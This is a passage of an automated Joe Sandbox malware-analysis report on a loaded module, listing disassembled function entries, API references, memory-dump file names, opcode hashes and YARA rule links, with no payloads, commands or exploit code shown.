abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1c971736705a373ea79beeb5bb8bc4862377617b0c1d9135017d97de9c957868
Instruction ID: 71dd51415db59e9b2410f9959ada80d3a719c262666e4269387a030ba4a5ddb2
Opcode Fuzzy Hash: 1c971736705a373ea79beeb5bb8bc4862377617b0c1d9135017d97de9c957868
Instruction Fuzzy Hash: D641CEB1A052148FCB00DF68C4917E9BFF5BF4A348F59846AE854EF786D335D4028B52

Function 6C9CD370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9CCD00: strlen.MSVCRT ref: 6C9CCD7D

Sleep.KERNEL32 ref: 6C9CD4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: c260ca4cfb80bbe21ce7e944133a446a5cc4eb1e275918244e1b94380576c928
Instruction ID: 9d580adcddeb3eb6e51b418f14e34da2f3f7147715c1ed8c10b20d3c29446a93
Opcode Fuzzy Hash: c260ca4cfb80bbe21ce7e944133a446a5cc4eb1e275918244e1b94380576c928
Instruction Fuzzy Hash: 1151EDA17083C2C9EB59DB39804A7017FF457DB308F08855CC6888B783D7BA994AD7A7

Function 6C9CD570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c020201b34fe5f0c00066b93ea8f1e42819af3158f515f9b0632cc77f075ca41
Instruction ID: b189b94f3dfac13402154d5da1b1731a515c41931a9f0840fe8418e26976d8ea
Opcode Fuzzy Hash: c020201b34fe5f0c00066b93ea8f1e42819af3158f515f9b0632cc77f075ca41
Instruction Fuzzy Hash: F631D1717493068FE3109F69D98076ABBE4AFC931CF14892EE59897B01E334E544CB83

Function 6C9CD67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 38ab007d132d82c9fd61265e26d3d8950e75ad45d6caa2338c2ceee73aa6fd8f
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: ECB01232DD9D30C347803BA404610B5B2745F3338C703FC40412633E010F00F444C08A

Function 6C9CD6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c2771a9c8b492b4efe5f45bcfdcd226b5de267d820391a7b43c1e9cea02cb8d4
Instruction ID: 7f985278b016c29a477b8f6a902651ed3b4b8a70485776e5a0e1fa0f2a255694
Opcode Fuzzy Hash: c2771a9c8b492b4efe5f45bcfdcd226b5de267d820391a7b43c1e9cea02cb8d4
Instruction Fuzzy Hash: 4B4121B1B493018FE310DF1AC59076ABBE4EF89708F20896EE598C7B51D375D9488B93

Function 6C9CD855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9d5b91650215742184758bb39419151f5f3f6e221ff7d2a0c21ef946fa00d8a1
Instruction ID: 8a2e6944beb04ac61a571f1b363c144767fb557c3f0aba591961414d6ce2783c
Opcode Fuzzy Hash: 9d5b91650215742184758bb39419151f5f3f6e221ff7d2a0c21ef946fa00d8a1
Instruction Fuzzy Hash: 27E06D72A486564BE750FE68D0813297BE1AF8330CF595C9CC6A53BB42C764F84AC787

Function 6C9DC330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C9DC3A1
fwrite.MSVCRT ref: 6C9DC448
fputs.MSVCRT ref: 6C9DC465
fwrite.MSVCRT ref: 6C9DC48E
fputs.MSVCRT ref: 6C9DC4AD
fwrite.MSVCRT ref: 6C9DC4DC
fwrite.MSVCRT ref: 6C9DC50E
abort.MSVCRT ref: 6C9DC513
abort.MSVCRT ref: 6CA96157
free.MSVCRT ref: 6CA9615F

Part of subcall function 6C9CA340: strlen.MSVCRT ref: 6C9CA3C5
Part of subcall function 6C9CA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C9DC41C), ref: 6C9CA3E0
Part of subcall function 6C9CA340: free.MSVCRT ref: 6C9CA3EA

Strings

terminate called after throwing an instance of ', xrefs: 6C9DC441
-, xrefs: 6C9DC4C1
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C9DC349
terminate called without an active exception, xrefs: 6C9DC4D5

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 7165298ba394bf0807a65c540b313915d1e2ea12abd894fe58af7098483790ce
Instruction ID: be72c97da60c39970f8bd84480dfb533a7eb4a1a9f4352b4aa2c7eb8ac3a1e9f
Opcode Fuzzy Hash: 7165298ba394bf0807a65c540b313915d1e2ea12abd894fe58af7098483790ce
Instruction Fuzzy Hash: 3A5168B18087159FDB00AF68C48939EBBF4AF91308F02C91DE4999B741DB789489CF93

Function 6C9CD8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0c93611d7c253ece90d3d5ce0471e72fb8aa730e708e13cc91758499ec0dd289
Instruction ID: 179fd27aea105e5a3954f2ef0ccadc7bfc0182f8460e94146d927badabbf6af1
Opcode Fuzzy Hash: 0c93611d7c253ece90d3d5ce0471e72fb8aa730e708e13cc91758499ec0dd289
Instruction Fuzzy Hash: 08F0E9B1A643454FD3009F1884817657BA47F43318F480C84D8842BB42C729E498C7D2

Function 6C9CDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C9CDEB8

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 9a6faa9b73e3969012390b7fbdc2e924a6797d6346d6344f2eadb5e03e59246a
Instruction ID: 9fd4f28c403e17588109c589480d811b4a7c8a073694d650b8d19bb5011462c8
Opcode Fuzzy Hash: 9a6faa9b73e3969012390b7fbdc2e924a6797d6346d6344f2eadb5e03e59246a
Instruction Fuzzy Hash: D121C67274061D8ADB10DF54CC84BD977B8AF96318F1045A6C818AB710EB34DE88CF83

Function 6C9CDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6f32637d1c569dd18d6e503245cfc11b8cb15005ec60322af0d7951369c936f4
Instruction ID: 631a28dfb8346ef37e787838413edb99cd2b4b35fd8c6436dc4765189d81b975
Opcode Fuzzy Hash: 6f32637d1c569dd18d6e503245cfc11b8cb15005ec60322af0d7951369c936f4
Instruction Fuzzy Hash: 7C414C75A042199BCB10DF54C880BDEB7F5AF99318F1589A9D809B7700DB30EE89CF92

Function 6C9CDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 41ed982a1b79745a4019aa210ecb0290b062ab7854481ce017a5a165bab68c76
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: EE112175A402189BCB14EF54C8909DEB7B5AF95358F05C9A4DC0977B01DB30EE49CBD2

Function 6C9CDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: 71cc2ab13c2c83610ba63c48895335ba4f58d823a705b801e2bc551083863e52
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: FC211A75A0021D9BCF10DF60C8809DEB7B5EF95348F1588A8D80977741DB30EE49CB92

Function 6C9D0310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA9395F), ref: 6C9D034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA9395F), ref: 6C9D0352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA9395F), ref: 6C9D0360

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
